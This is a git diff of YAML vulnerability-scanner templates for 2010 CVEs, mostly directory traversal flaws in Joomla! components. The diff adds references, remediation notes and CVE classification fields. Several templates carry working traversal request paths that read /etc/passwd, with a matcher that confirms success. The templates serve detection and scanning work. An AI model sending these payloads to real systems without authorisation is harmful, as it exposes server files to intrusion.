+4,27 @@ info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 + - http://secunia.com/advisories/39475 + - http://www.exploit-db.com/exploits/12239 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1952 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml index 106ad37fdc..5a2a33c919 100644 --- a/cves/2010/CVE-2010-1953.yaml +++ b/cves/2010/CVE-2010-1953.yaml @@ -4,24 +4,28 @@ info: name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12288 - https://www.cvedetails.com/cve/CVE-2010-1953 + - http://www.vupen.com/english/advisories/2010/0927 + - http://www.exploit-db.com/exploits/12288 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1953 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml index 15235070e6..67e4710e8c 100644 --- a/cves/2010/CVE-2010-1954.yaml +++ b/cves/2010/CVE-2010-1954.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12287 - https://www.cvedetails.com/cve/CVE-2010-1954 + - http://www.securityfocus.com/bid/39552 + - http://www.exploit-db.com/exploits/12287 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1954 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml index 932f7d5fe8..bdb1172ecd 100644 --- a/cves/2010/CVE-2010-1955.yaml +++ b/cves/2010/CVE-2010-1955.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12238 - https://www.cvedetails.com/cve/CVE-2010-1955 + - http://www.securityfocus.com/bid/39508 + - http://secunia.com/advisories/39473 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1955 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml index a9e931f712..15d2026732 100644 --- a/cves/2010/CVE-2010-1956.yaml +++ b/cves/2010/CVE-2010-1956.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12285 - https://www.cvedetails.com/cve/CVE-2010-1956 + - http://secunia.com/advisories/39522 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1956 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml index 7f16c277c4..fee775cfe3 100644 --- a/cves/2010/CVE-2010-1957.yaml +++ b/cves/2010/CVE-2010-1957.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12235 - https://www.cvedetails.com/cve/CVE-2010-1957 + - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1957 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/16 diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml index 71de2a9492..a28a59056f 100644 --- a/cves/2010/CVE-2010-1977.yaml +++ b/cves/2010/CVE-2010-1977.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12083 - https://www.cvedetails.com/cve/CVE-2010-1977 + - http://www.securityfocus.com/bid/39243 + - http://secunia.com/advisories/39356 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1977 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/16 diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml index 00cab2ad0f..3b1f768585 100644 --- a/cves/2010/CVE-2010-1979.yaml +++ b/cves/2010/CVE-2010-1979.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - https://www.cvedetails.com/cve/CVE-2010-1979 + - http://secunia.com/advisories/39360 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1979 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1980.yaml b/cves/2010/CVE-2010-1980.yaml index 37219a9e71..c251891840 100644 --- a/cves/2010/CVE-2010-1980.yaml +++ b/cves/2010/CVE-2010-1980.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12085 - https://www.cvedetails.com/cve/CVE-2010-1980 + - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt + - http://www.exploit-db.com/exploits/12085 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1980 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml index bb141c636c..00c934810c 100644 --- a/cves/2010/CVE-2010-1981.yaml +++ b/cves/2010/CVE-2010-1981.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Fabrik 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12087 - https://www.cvedetails.com/cve/CVE-2010-1981 + - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt + - http://www.exploit-db.com/exploits/12087 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1981 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1982.yaml b/cves/2010/CVE-2010-1982.yaml index f58840909d..15283354c4 100644 --- a/cves/2010/CVE-2010-1982.yaml +++ b/cves/2010/CVE-2010-1982.yaml @@ -1,12 +1,18 @@ id: CVE-2010-1982 + info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12121 - https://www.cvedetails.com/cve/CVE-2010-1982 + - http://secunia.com/advisories/39202 + - http://www.securityfocus.com/bid/39343 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1982 tags: cve,cve2010,joomla,lfi requests: @@ -19,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml index 2c169b3f5c..48292064e9 100644 --- a/cves/2010/CVE-2010-1983.yaml +++ b/cves/2010/CVE-2010-1983.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component redTWITTER 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12055 - https://www.cvedetails.com/cve/CVE-2010-1983 + - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt + - http://www.exploit-db.com/exploits/12055 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1983 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml index 19eba6d68b..4e0eed3c3d 100644 --- a/cves/2010/CVE-2010-2033.yaml +++ b/cves/2010/CVE-2010-2033.yaml @@ -4,10 +4,15 @@ info: name: Joomla Percha Categories Tree 0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://www.cvedetails.com/cve/CVE-2010-2033 + - http://secunia.com/advisories/39873 + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2033 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml index 4600c605a4..80fa7717b0 100644 --- a/cves/2010/CVE-2010-2034.yaml +++ b/cves/2010/CVE-2010-2034.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34003 - https://www.cvedetails.com/cve/CVE-2010-2034 + - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2034 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2035.yaml b/cves/2010/CVE-2010-2035.yaml index d34c0bda56..25cefc0e1a 100644 --- a/cves/2010/CVE-2010-2035.yaml +++ b/cves/2010/CVE-2010-2035.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34006 - https://www.cvedetails.com/cve/CVE-2010-2035 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2035 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml index 9cbb501b85..26186a8afc 100644 --- a/cves/2010/CVE-2010-2036.yaml +++ b/cves/2010/CVE-2010-2036.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34004 - https://www.cvedetails.com/cve/CVE-2010-2036 + - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2036 tags: cve,cve2010,lfi,joomla requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index e3db0ee030..0ec135d12a 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 + - http://www.securityfocus.com/bid/40244 + - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2037 tags: cve,cve2010,lfi,joomla requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2045.yaml b/cves/2010/CVE-2010-2045.yaml index b40cfaab94..131b2df9e3 100644 --- a/cves/2010/CVE-2010-2045.yaml +++ b/cves/2010/CVE-2010-2045.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12595 - https://www.cvedetails.com/cve/CVE-2010-2045 + - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2045 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2050.yaml b/cves/2010/CVE-2010-2050.yaml index 9aedcbfc20..2c6104b29d 100644 --- a/cves/2010/CVE-2010-2050.yaml +++ b/cves/2010/CVE-2010-2050.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12611 - https://www.cvedetails.com/cve/CVE-2010-2050 + - http://www.securityfocus.com/bid/40185 + - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2050 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 78a3fb66d0..55fdfe4f10 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml @@ -1,13 +1,18 @@ id: CVE-2010-2122 info: - name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://www.cvedetails.com/cve/CVE-2010-2122 + - https://www.exploit-db.com/exploits/12618 + - http://www.securityfocus.com/bid/40192 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2122 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2128.yaml b/cves/2010/CVE-2010-2128.yaml index cf019f95a3..1237eb6309 100644 --- a/cves/2010/CVE-2010-2128.yaml +++ b/cves/2010/CVE-2010-2128.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. - reference: | + description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12607 - https://www.cvedetails.com/cve/CVE-2010-2128 + - http://secunia.com/advisories/39832 + - http://www.exploit-db.com/exploits/12607 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2128 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2259.yaml b/cves/2010/CVE-2010-2259.yaml index 0d38e58882..0d1cebd3bb 100644 --- a/cves/2010/CVE-2010-2259.yaml +++ b/cves/2010/CVE-2010-2259.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component com_bfsurvey - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10946 - https://www.cvedetails.com/cve/CVE-2010-2259 + - http://secunia.com/advisories/37866 + - http://www.exploit-db.com/exploits/10946 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2259 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 108671e209..8ee4309fff 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - tags: cve,cve2010,iot,lfi + - http://www.osvdb.org/65249 + - https://www.exploit-db.com/exploits/12865 + remediation: Upgrade to a supported product version. + classification: + cve-id: CVE-2010-2307 + tags: cve,cve2010,iot,lfi,motorola requests: - method: GET @@ -19,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2507.yaml b/cves/2010/CVE-2010-2507.yaml index 4ff7972b09..64b3ed8517 100644 --- a/cves/2010/CVE-2010-2507.yaml +++ b/cves/2010/CVE-2010-2507.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/13981 - https://www.cvedetails.com/cve/CVE-2010-2507 + - http://osvdb.org/65674 + - http://secunia.com/advisories/40297 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2507 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2680.yaml b/cves/2010/CVE-2010-2680.yaml index fa1dc916da..c7d3043166 100644 --- a/cves/2010/CVE-2010-2680.yaml +++ b/cves/2010/CVE-2010-2680.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/14064 - https://www.cvedetails.com/cve/CVE-2010-2680 + - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt + - http://www.securityfocus.com/bid/41163 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2680 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2682.yaml b/cves/2010/CVE-2010-2682.yaml index 180ce24bb8..c7397e6665 100644 --- a/cves/2010/CVE-2010-2682.yaml +++ b/cves/2010/CVE-2010-2682.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! 